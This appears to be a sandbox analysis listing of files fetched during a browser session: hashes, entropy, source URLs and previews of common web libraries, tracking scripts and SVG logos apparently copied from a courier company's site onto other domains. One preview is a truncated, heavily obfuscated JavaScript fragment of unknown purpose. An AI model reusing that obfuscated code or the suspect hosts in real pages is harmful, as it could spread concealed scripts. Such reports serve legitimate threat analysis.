            Entropy (8bit):5.228771310423195
            Encrypted:false
            SSDEEP:1536:9zT3cqXddzzFu1yNqeoNo/oWHBwag7pnx8BEDtJoo:9zRDzFYeoNo/oWHF2IK
            MD5:AAA80125DF1DAEF35FE575A07044B293
            SHA1:CF1F92060792DCF57655AD2EE100D462E1C19D2A
            SHA-256:2AFAA0458E89BBFFD65FFD0791A1F75055BDB128DAB1505843DF3C8B35B063E7
            SHA-512:9EDFF44B77BE7632A34CD622F26780BEC3F734B915C618D918B974F581104245A530E23F62AF9001C4FC09055A48929E874215630274B0AA8DC6D87801BCE0DA
            Malicious:false
            Reputation:low
            URL:https://uzer.co/js/modernizr.js
            Preview:/* Modernizr 2.6.2 (Custom Build) | MIT & BSD..* Build: http://modernizr.com/download/#-csstransforms-csstransforms3d-shiv-cssclasses-prefixed-teststyles-testprop-testallprops-prefixes-domprefixes..*/..;window.Modernizr = function(a, b, c) {..function z(a) {...j.cssText = a..}..function A(a, b) {...return z(m.join(a + ";") + (b || ""))..}..function B(a, b) {...return typeof a === b..}..function C(a, b) {...return !!~("" + a).indexOf(b)..}..function D(a, b) {...for (var d in a) {....var e = a[d];....if (!C(e, "-") && j[e] !== c).....return b == "pfx" ? e : !0...}...return !1..}..function E(a, b, d) {...for (var e in a) {....var f = b[a[e]];....if (f !== c).....return d === !1 ? a[e] : B(f, "function") ? f.bind(d || b) : f...}...return !1..}..function F(a, b, c) {...var d = a.charAt(0).toUpperCase() + a.slice(1)...., e = (a + " " + o.join(d + " ") + d).split(" ");...return B(b, "string") || B(b, "undefined") ? D(e, b) : (e = (a + " " + p.join(d + " ") + d).split(" "),...E(e, b, c))..}..v
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (26997)
            Category:downloaded
            Size (bytes):29401
            Entropy (8bit):5.620670477428596
            Encrypted:false
            SSDEEP:768:crqD7GzOol+D45YMJR3kWG6UdCDxgtmKg3vTpzaDNCY5R:1fGkWodCFgtmKgNzaxCq
            MD5:F38113141BA37F6D39DA0F22FB96702A
            SHA1:BEC789CA106293F96D2CF31285236398776B911E
            SHA-256:64CB11EB2A5237CBE1E05CCF25ACEFEED578F32D1A6923D58DE35C8A0145E8CD
            SHA-512:0CD78386C97E1569F1E41D44433B1AC873323FA5E5FCC83EBDC9C53D718D8D466B5B6F2141A6B5F80E2A2FD33E02238C9A40212805981E1D5AFADEAAC6D87353
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/npm/intl-tel-input@17.0.8/build/js/intlTelInput.min.js
            Preview:/*. * International Telephone Input v17.0.8. * https://github.com/jackocnr/intl-tel-input.git. * Licensed under the MIT license. */..!function(a){"object"==typeof module&&module.exports?module.exports=a():window.intlTelInput=a()}(function(a){"use strict";return function(){function b(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function c(a,b){for(var c=0;c<b.length;c++){var d=b[c];d.enumerable=d.enumerable||!1,d.configurable=!0,"value"in d&&(d.writable=!0),Object.defineProperty(a,d.key,d)}}function d(a,b,d){return b&&c(a.prototype,b),d&&c(a,d),a}for(var e=[["Afghanistan (............)","af","93"],["Albania (Shqip.ri)","al","355"],["Algeria (..........)","dz","213"],["American Samoa","as","1",5,["684"]],["Andorra","ad","376"],["Angola","ao","244"],["Anguilla","ai","1",6,["264"]],["Antigua and Barbuda","ag","1",7,["268"]],["Argentina","ar","54"],["Armenia (........)","am","374"],["Aruba","aw","297"],["Australia","
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
            Category:dropped
            Size (bytes):87444
            Entropy (8bit):5.020327176760808
            Encrypted:false
            SSDEEP:768:YCAk8JLWWrAV32IVKhjZnyx8dX59pFDq765Q6:uLWWrG2MKhjZnu059pFDq765t
            MD5:2FE63282AA86731ED77C5962DB9B7CD4
            SHA1:D228AB67E3BEF6811ED0CD9812C89305A601F463
            SHA-256:B17587B7F1F6B9D4EEDEF2894132B9F51B0F093ECED7FDC1B6BF3FE1140DFF8E
            SHA-512:7BD02029B8296EEC8B9124DFEA7419FDECD30F235433B6AACEDB23F35E8E7362F1CFA216E286AC106C97AAD6EEC3B4FDD9924672F0EE94EED3E56A8C062E44B1
            Malicious:false
            Reputation:low
            Preview:const a14_0x3beb42=a14_0x1940;(function(_0x35b4e8,_0xbe4ea8){const _0x3821d3=a14_0x1940,_0xf7b51e=_0x35b4e8();while(!![]){try{const _0x5b5613=-parseInt(_0x3821d3(0x196))/0x1*(-parseInt(_0x3821d3(0x27d))/0x2)+-parseInt(_0x3821d3(0x2f0))/0x3+-parseInt(_0x3821d3(0x42c))/0x4*(parseInt(_0x3821d3(0x277))/0x5)+-parseInt(_0x3821d3(0x41c))/0x6+parseInt(_0x3821d3(0x4a5))/0x7*(-parseInt(_0x3821d3(0x3a9))/0x8)+parseInt(_0x3821d3(0x2e1))/0x9+parseInt(_0x3821d3(0x344))/0xa;if(_0x5b5613===_0xbe4ea8)break;else _0xf7b51e['push'](_0xf7b51e['shift']());}catch(_0xaff89e){_0xf7b51e['push'](_0xf7b51e['shift']());}}}(a14_0x2f51,0x3d2cf));const a14_0x36ca29=(function(){let _0x293e3a=!![];return function(_0x4f75a0,_0x12b2b1){const _0x894676=_0x293e3a?function(){const _0x2af55f=a14_0x1940;if(_0x12b2b1){const _0x45dc59=_0x12b2b1[_0x2af55f(0x3c3)](_0x4f75a0,arguments);return _0x12b2b1=null,_0x45dc59;}}:function(){};return _0x293e3a=![],_0x894676;};}()),a14_0x55a279=a14_0x36ca29(this,function(){const _0x2dfa82=a14
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):14355
            Entropy (8bit):4.274057131627799
            Encrypted:false
            SSDEEP:384:1c5AJ5R2PugrvZlhPgzRC3fItouTdntz0zxNRm0Gk:1cCHRG4w3fItb47Rx
            MD5:A285FBD394AD0945F44F98DB3A7CBA67
            SHA1:18E804624CE2F1474F2A83BB863C72BFE1ACF05B
            SHA-256:3F321027E83D192F47931DE7BB7141C30FC2D6C1D87FDFAF3F3FE90B8804EED8
            SHA-512:47068094834F624617B564F9BD312C8BCDA987756C8FA902B2635BAEDE5DDAE29FC3A2EE3DB3625BF5F5FAE2770B6EB5E221DF599EC5C7D3A572C8BC9051EB6C
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/logo-servientrega-blanco.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="182px" height="31px" viewBox="0 0 182 31" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1725
            Entropy (8bit):4.920745464472701
            Encrypted:false
            SSDEEP:24:2dZnmPLOVL/veaxM7JVjXJ4MyMrGRyGijKIG9hKy+Bo2A1RDNAgJQwweU8Db:cZmjOVk3yqqdijKNnKyf2oRtGhLUb
            MD5:C882A3E11B6D09B32F4B72023B6FB2B3
            SHA1:276B936DCBD1B547957F6136016C3930BBAB0E17
            SHA-256:A46300114C6A0A77929B902C43F745942DB3857E3E6B6AD0FAC9997F7DB60E45
            SHA-512:C2549E234CDEF326BB6D6B09AF30B2B9414CC5CE95780837DDB8F62306E1F14B8042B5503253E73899A019DADE6DB201B235C5ED2233F1DFDA96686E1415E832
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-01.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 60</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-286.000000, -978.000000)" id="Group-60">.. <g transform="translate(286.000000, 978.000000)">.. <g id="Group-52" fill="#2357FF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="abstract" transform="translate(17.000000, 14.000000)" fill="#FFFFFF" fill-rule="nonzero">.. <path d="M2.19296,10.9216 L0.00864,10.9216 C0.00864,19.367232 6.854528,26.2144 15.30016,26.2144 L15.30016,24.02976 C8.060736,24.02976 2.19296,18.161024 2.19296,10.9216 Z" id="Path"></path>.. <path d="M15.30016,2.18464 L15.30016,0 C9.267264,0 4.377
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 5 x 264, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):355
            Entropy (8bit):6.303699144857473
            Encrypted:false
            SSDEEP:6:6v/lhP3j/oe38RqPViFClo5lSJ/zQfezmHZBk0R8Ec3ZsgwWfYNUwWgoj2up:6v/7zoe38qPym2lSNQ2CbzRvusg1wNUF
            MD5:04F303F4FF51480180C6D5DF9A670F54
            SHA1:F306CB96497443764E65581701DADDDE0FD806CF
            SHA-256:B7F368D7AD495F0B7C6E853FC8A7F0D462C71951775E4F7BFA1A2A0738EA1F26
            SHA-512:92E22C37DFB41605AA1D2D6D08DBB2F1A7B76BF234270BCF9EFAC0E55E424A2AA1365BE003B4B523FDEF955ADED358D1F06846A3BBB54FBFBA34EC6600E38482
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/separador-dato2.png
            Preview:.PNG........IHDR...............>.....sRGB........DeXIfMM.*.......i........................................................Lf......IDATX....@.../...e.........'=..(.X..(..*D11?.....xnl=..?.sqr[...`..y.c#..X......z..,.b..<..`h.... !..q..4......x..X.......Dp.\lQ.M.ZU..\.3.m.#(&P..@....(.........._..@38...Q.2..4......_].dk.h..... ...cZ....IEND.B`.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (11922)
            Category:downloaded
            Size (bytes):13051
            Entropy (8bit):5.4071605765986295
            Encrypted:false
            SSDEEP:192:LbnBH5tmjHCR/UeHjXWb2pTOnBwatCp0NFnWxWkMTMm53NiE:LbnBqjURHjXo20wwCi5kMYm53N5
            MD5:B073A4FD1AAAC45BECAE527F47E6795B
            SHA1:E4469EE8BDE7CEDE14C8983883126EA4300B500B
            SHA-256:EF0AC812141070E60A504C58DB6389E723C8FB521704010A9E15F2CA7FA323D6
            SHA-512:6DB8EEEAE65922927DC2E3A9418C632CB012EC63036EBC5A17BC048D7DF43C651E4F00AE7F9685C46E6E75E62CF25F56BC1DE7BF8B7C675F6ADD66D8B90B544C
            Malicious:false
            Reputation:low
            URL:https://static.hotjar.com/c/hotjar-3513970.js?sv=6
            Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":3513970,"rec_value":1.0,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_console_consent":true,"anonymize_digits":true,"anonymize_emails":true,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":false,"legal_name":null,"privacy_policy_url":null,"deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"kissmetrics":{"send_user_id":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"hubspot":{"enabled":false,"send_recordings":false,"send_surveys":false}},"features":["ask.popover_redesign","client_script.compression.pc","error_reporting","feedback.embeddable_widget","feedback.widgetV2","settings.billing_v2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (22932)
            Category:downloaded
            Size (bytes):23070
            Entropy (8bit):5.226634512155472
            Encrypted:false
            SSDEEP:384:QhrHpZky+JB6/tX2lHldkMiYnFpY54LjfdANAc0Eny+RWuW7NeoMwV/vtrx+OLDE:c+JB6/8lHldkMioFpY54PKQEny+kLxVc
            MD5:9346EC27896981BC4C0B146CF327727A
            SHA1:21486194BAA22EB1155FE98BF7AF6314E7773CC7
            SHA-256:50E497B00818378DCFFE856B994F89947B620C66163768879C9B8A63D583F898
            SHA-512:6DA45EF1A2F7F82BE8F17464F9827FD4A7490C18B86B2EC43677DAA7F80475147EAF3D2B0931C1343542626E87951DD698C142BD14B87D9936A8D2486323E019
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/jquery.validation/1.16.0/jquery.validate.min.js
            Preview:/*! jQuery Validation Plugin - v1.16.0 - 12/2/2016. * http://jqueryvalidation.org/. * Copyright (c) 2016 J.rn Zaefferer; Licensed MIT */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=a(require("jquery")):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.on("click.validate",":submit",function(b){c.settings.submitHandler&&(c.submitButton=b.target),a(this).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(this).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.on("submit.validate",function(b){function d(){var d,e;return!c.settings.submitHandler||(c.submitButton&&(d=a("<input type='hidden'/>").attr("name",c.s
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5552)
            Category:downloaded
            Size (bytes):66711
            Entropy (8bit):5.318187471770509
            Encrypted:false
            SSDEEP:1536:RJeUwT7hpwNCHM9ZK0BK01QYTZ02LKVsdmpyKcic1:RIT7Ds9ZKAKBYj8wKcH1
            MD5:AEAA36411B7F2550667758ACC88E3596
            SHA1:B179B2EE761A847CC7B5AD4B82BAB8AE0C0302C9
            SHA-256:85F426C220B3A6337221CDD051C2E6C64BF7FBC8BB854F9862626DABE7AF9D28
            SHA-512:E631F9DA3B0FFCB51933671A281A5580C7CB116880BFA4E961E74A7E6E05DA78E1BE480B7871154590335A04EE8C333B575885200EA09FF29C34C3892D9F7F56
            Malicious:false
            Reputation:low
            URL:https://connect.facebook.net/signals/config/524515998044999?v=2.9.168&r=stable&domain=uzer.co&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):116263
            Entropy (8bit):7.980667893775942
            Encrypted:false
            SSDEEP:3072:lk3+lcSZUzNQYXVJxtT/Q/p97SF07EPJHssCApYBE:uycSZMNQm78x9717mHsseE
            MD5:37C37EFC36F1D521902B3D14A9F2F943
            SHA1:6087CE1B9B1ADB58DD0F952821A26BC74369A642
            SHA-256:46FBD89826A81DE3FAB251B3D4BC84C6FD55A2014CDA483253E87E55BC8D5BB4
            SHA-512:049117A8999E219441FBFAB59FE5622A17D5ACFCBE9734C883576DDBFEEF27974075CEFC18C95DF5B2DD4D6B2FDBC51FD2DD4ACED1AD7176ECBCA643404658BC
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............{Oa....PLTE..K..V..Q..O........T..X..V..U..J.....S.....N..O..J..Q.....R..L.....P..M..M..L........O......$.U..M..L..\..R..N.....H.....G..F.....P..D..I.....?..C..<......-.Y648-&3..B...........A..;..@...........=.....:........Iecg>FF......*.`..N..............?......:.m..%u.......m..llk..J...{........z..J....)4.B8N.LLL..........8yyyJ-.....WWX...........&^7...`__/...]....=#....7B..s.H.rqr6.`.....2.ELX7&o..8?..........Da.......<........!.e.....}.......o+R.}att...qO...>.\ZkkC.q..D...{...eD..i..+.R9.OW.Y;...Q..zV..;.yp..l.....[L._j..MCX........o.............j....].....d...1cM8....x.I.[b...qD-..........1........zd#.]W.q.iU|.S}...gn;u8.u..[.`zD.rj....W..n..N.......S..En......I..H....o.n.i)H.S.!....RS....j6~..t..;......R.........&....tRNS.....{.....IDATx...n. .D.<.E....6..=b.S'.1......OG....~/--.7"5.+..^.Ss./|...>.Eo....Y...}t..l..o...#CU?.....z...L&.A..D%.\....i....*7..W*..Qy.]...]..!..27u....~_.K...o,\#3.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2828
            Entropy (8bit):4.702208915781906
            Encrypted:false
            SSDEEP:48:cxnxGnsAP/3fUn5XULwkDrtk6UvpUhkzUV2emGcKU8hE:q+/e5XUkkftLMpUhkzUVSGJU8m
            MD5:6F4A7A49589ED8AF694003220991F244
            SHA1:2CBE51B914ED62236DFBF5C4E6D77ED765BE2699
            SHA-256:276101F05F88FC3394CB7515C626053A624413ABC4607AF869E0288AB6E637D5
            SHA-512:339C969ACEB361674FD0B362719021E4197C51B0C461AA4701BEFF9B6B5C6A6F8133CF4216EC9FC6E5F9E4C1219C1559871AF5ECDA32D5627EEF3937013DCF8B
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 29</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-1088.000000, -126.000000)">. <g id="Group-29" transform="translate(1088.000000, 126.000000)">. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3" fill="#009A44">. <path d="M20.1868332,20.1871639 L18.8322719,20.1871639 L18.8322719,3.68059679 C18.8322719,3.45612296 18.6499437,3.27422175 18.4254735,3.27422175 L2.73234361,3.27422175 C2.50787345,3.27422175 2.32597522,3.45612296 2.32597522,3.68059679 L2.32597522,20.1871639 L0.812736767,20.1871639 L0.812736767,0.812750081 L20.1868332,0.812750081 L20.1868332,20.1871639 Z M3.13871199,7.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2075
            Entropy (8bit):4.841220551602856
            Encrypted:false
            SSDEEP:48:cUjTtm/HPYay5Bb1qFWvgiwT7CWvQ8uOnwkB9qZVe:xHEvE5F1qiICWvQ8rZqLe
            MD5:E30057AED282B66FE4EB51017B20E1B1
            SHA1:C121EB49AF5954666B8DC2B505F4CA83C36D34A1
            SHA-256:F56965B808E2681B1CC8E53270AECA700084404A3A210C0FF9247392EA34B935
            SHA-512:E452B11E6E8A957BC5754F5F751DB9936CC23A23C7CE8DD8885F36CA832E2299D860F21C1E2685E1B69BB7A46B16BFCF5A7E5EF7010A41D91AC38FC24168E263
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/64.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <filter id="filter_1">.. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0" />.. </filter>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="path_1" />.. <clipPath id="mask_1">.. <use xlink:href="#path_1" />.. </clipPath>.. </defs>.. <g id="facebook-(1)">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Mask" fill="#1977F2" fill-rule="evenodd" stroke="none" />.. <g clip-path="url(#mask_1)">.. <g id="facebook-(1)" transform="translate(6.708313 5.75)" filter="url(#filter_1)">.. <path d="M2.38979 9.75582C2.33005 9.75582 1.01566
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1189
            Entropy (8bit):4.960460618230308
            Encrypted:false
            SSDEEP:24:2dcQ+9xJoeH4mFTt3Qeow6Y/aTMTXMGpFR8ZfpYplTuDbU/ewVR4WY2:cbe0nm1Jj6WXXV+fSVPX4y
            MD5:A7A96451EBDF70AA5F17172EE1EB7376
            SHA1:10F2ACF161E72FBDC18E631261C0F0A9DE04C51F
            SHA-256:C0C2438DDBF2DC191FF70846BCC30C579B71393B82C3C22C10D55AF8A242A3A0
            SHA-512:82FB50AED516CC407DC9D72630FA84223A856894CA68AAFC293C05FF511FC729875AC3339974FAE85D3A1F485A50DE297E4FF2154480FA73AD6544469CF3B209
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/54.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="menu-(1)">.. <path d="M0.875252 1.61904L22.1541 1.61904C22.6373 1.61904 23.0294 1.25634 23.0294 0.809522C23.0294 0.362636 22.6372 0 22.1541 0L0.875252 0C0.392081 0 1.77376e-14 0.362704 1.77376e-14 0.809522C1.77376e-14 1.25634 0.392154 1.61904 0.875252 1.61904Z" transform="translate(3.970581 0)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M26.117 0L0.882973 0C0.395539 0 1.77982e-14 0.362704 1.77982e-14 0.809523C1.77982e-14 1.25634 0.395613 1.61905 0.882973 1.61905L26.117 1.61905C26.6044 1.61905 27 1.25634 27 0.809523C27 0.362704 26.6044 0 26.117 0Z" transform="translate(0 8.095215)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M18.7086 0L0.938481 0C0.420405 0 -2.79474e-14 0.362704 -2.79474e-14 0.809522C-2.79474e-14 1.25641 0.420483 1.61904 0.938481 1.61904L18.7086 1.619
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):25821
            Entropy (8bit):4.40402848184812
            Encrypted:false
            SSDEEP:192:Lrh963ROda6jjEi/rGewdt7yM6eJe/ahXi/OGen3Qrdn/vRni/YGeRkt7aK6e5ep:nh9mOM6nseMhb3e9RVVU73TAd
            MD5:0462C275036497B098EBF1024AFDA963
            SHA1:CBF50789EBB5468D18E3A00C8026088E8DF1FEA2
            SHA-256:8F1F0A6BB665FA3AB90141CCCD52C27299D353DAA4CD6F2AD9358C145D314D91
            SHA-512:F85547BFA5CB197BDCDD46E441F74C4277BE8E6B0A9AD5E715E810DB2D5F8F1821F632D0FE44FB99DC8A85400F20F3F17BBBC3A58565D0C872584AA8105CA273
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/flag-usa.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="united-states">.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.76764 0 1.71464L0 13.2853C0 14.2323 0.771174 15 1.72253 15L21.2775 15C22.2288 15 23 14.2323 23 13.2853L23 1.71464C23 0.76764 22.2288 0 21.2775 0Z" transform="translate(0 4.4716053E-05)" id="Path" fill="#F5F5F5" stroke="none" />.. <g id="Group" transform="translate(0 4.4716053E-05)">.. <path d="M0 1.15385L22.8105 1.15385C22.5771 0.482352 21.9367 0 21.1827 0L1.62779 0C0.87382 0 0.233459 0.482352 0 1.15385Z" transform="translate(0.094740234 0)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 4.6153226)" id="Rectangle" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 2.3075273)" id="Rectangle" fill=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1257
            Entropy (8bit):4.845241911960573
            Encrypted:false
            SSDEEP:24:2d1bqE1L6/6gxTVafAdeaxM2LiUaNgGXo0NAPJIho0NAfNIho0NAk3Ig:cVqEV6SNPUsgo
            MD5:B964C0CA91B34049D7A880BEDEF08351
            SHA1:CBCC614ED18814D304320C57AC2A714623FF5543
            SHA-256:427365A3789A7E14C09B866482793263E4512643FD351E5B46635C9C81C04688
            SHA-512:4C00C688D45337EA1EC52F64917B777028DC7BE34B648E24616F53A44BF1B24ADCB1A68A28B5C1D7DC5AE7EA18748DA7C9AC6EE7E59A99860719AB9D1C69E4D0
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/more.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Icon/more</title>. <defs>. <filter color-interpolation-filters="auto" id="filter-1">. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 1.000000 0"></feColorMatrix>. </filter>. </defs>. <g id="Symbols" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Header" transform="translate(-1312.000000, -13.000000)">. <g id="more" transform="translate(1312.000000, 13.000000)" filter="url(#filter-1)">. <g>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="1.26527565" rx="1.04166667" ry="1.26527565"></ellipse>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" 